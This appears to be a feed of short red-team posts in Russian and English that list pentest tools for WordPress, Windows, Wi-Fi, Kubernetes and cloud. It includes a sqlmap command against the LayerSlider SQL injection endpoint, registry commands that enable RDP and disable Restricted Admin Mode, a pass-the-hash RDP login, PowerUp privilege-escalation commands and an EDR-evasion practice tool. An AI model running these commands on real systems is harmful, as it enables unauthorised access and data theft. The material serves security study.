CI/CD

Gitea + Jenkins lab: https://github.com/cider-security-research/cicd-goat

CVE-2024-2879 LayerSlider плагин для WordPress
*
Версии LayerSlider 7.9.11 - 7.10.0 - Unauthenticated SQL Injection
*
Недостаточне экранирование позволяет добавлять дополнительные SQL-запросы к уже существующим, как итог = можно использовать для извлечения конфиденциальной информации из базы данных.
*
POC usage:
sqlmap "https:://OLOLO.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=" --risk=3 --level=4 --dbms=mysql --technique=T or sqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T


#wordpress

#maldev #redteam

Инструмент для имитации поведения AV/EDR. Утилита позволяет оттачивать навыки обхода средств защиты при создании своих загрузчиков.

1. Собираем проект ./compile.sh
2. Создаём файл ioc.json с паттернами шелл-кода
3. Запускаем инструмент, указываем идентификатор вредоносного процесса: .\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234

https://github.com/Helixo32/CrimsonEDR

Prototype pollution

Utils

* PPScan - Client Side Protype pollution Scanner
* fingerprint.js - noscript for finding gadgets
* untrusted-types - Chrome extension that abuses Trusted Types to log DOMXSS sinks
* pollute.js - simple tool to make it easier to exploit prototype pollution

List of known gadget

* Link - examples of libraries that are vulnerable to Prototype Pollution
* Link - payloads for known libraries

Kaspersky default exception

WPA_Sycophant

A tool to relay phase 2 authentication attempts to access corporate wireless without cracking the password.

#wifi

A simple tshark EAP certificate extractor - Link

For a more convincing attack, you can extract the Certificate used by a legitimate access point

./extract_EAP.sh -r <capture file>
./extract_EAP.sh -i mon0

#wifi

Kubernetes pentest tools

* kube-hunter - мощный инструмент от Aqua Security

* kubescape - выявление мисконфигов кластера, RBAC, скан образов

* kdigger - тулза для разведки окружения

* kubeletctl - кастомный клиент для общения с kebelet

* peirates - мульти-комбайн тулза для пентеста кластера, в том числе изнутри pod'а

* BOtB - инструмент для анализа и эксплуатации контейнеров

Krew kubectl plugins - https://krew.sigs.k8s.io/plugins/

Provide RDP access

Turn on

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

Bypass Restricted Admin Mode

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

Connect

xfreerdp /v:10.10.10.10 /u:username /pth:<NT_HASH> /dynamic-resolution +clipboard

PowerUp

PowerUp.ps1 - aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.

Contains abuse modules such as:

* Token/Privilege Enumeration
* Service Enumeration
* DLL Hijacking
* Registry Checks

e.g:
Display services the current user can modify

PS C:\Users\dave> Get-ModifiableServiceFile

PowerUp also provides us an AbuseFunction, which is a built-in function to replace the binary and, if we have sufficient permissions, restart it. The default behavior is to create a new local user called john with the password Password123! and add it to the local Administrators group

PS C:\Users\dave> Install-ServiceBinary -Name 'vulnService'

#windows #privesc

k8s LAN Party - небольшая CTF от Wiz Research, посвященная Kubernetes.

Write-up

This PowerShell noscript demonstrates advanced techniques including shellcode injection, dynamic function invocation, and PowerShell noscript obfuscation

Link

Protected users abuse

Link

Windows Local Privilege Escalation Cookbook

Tactics & Techniques for windows privileges escalation with explanations, examples and labs for each case

Link

A collection of manifests that create pods with different elevated privileges.

Quickly demonstrate the impact of allowing security sensitive pod attributes like

* hostNetwork
* hostPID
* hostPath
* hostIPC
* privileged

#kubernetes

pspy - unprivileged Linux process snooping

It allows you to see commands run by other users, cron jobs, etc. as they execute.

The tool gathers the info from procfs scans. Inotify watchers placed on selected parts of the file system trigger these scans to catch short-lived processes.

Also great to demonstrate why passing secrets as arguments on the command line is a bad idea.

Link

Инструменты для изучения безопасности kubernetes

* simulator (with AWS)
* kube_security_lab (On-premise)

Обзор на simulator - Link

#kubernetes

Multi Tool Kubernetes Pentest Image

This docker image by Luntry contains all the most popular and necessary tools for Kubernetes penetration testing

Inside:

* Shell via web
* common tools for kube pentest
* Bypass read-only container file system
* Bypass signature engine

#kubernetes

Multi-Cloud tools

Инструменты для тестирования облачных сред

* PurplePanda - поиск миссконфигов и privesc. Cloud/SaaS

* Prowler - проведение аудитов, реагирование на инциденты и многое другое в таких средах, как AWS, Azure, GCP и Kubernetes

* CloudSploit by Aqua - Cloud Security Scans

* ScoutSuite - Multi-Cloud Security Auditing Tool

Представление инфраструктурных объектов и связей между ними в виде графа Neo4j

* cartography
* starbase
* IceKube
* KubeHound

Дополнительный список cloud-sec инструментов - Link

Patroni authenticated Remote Code Execution

PoC
Discussion with developer: patroni/patroni#1734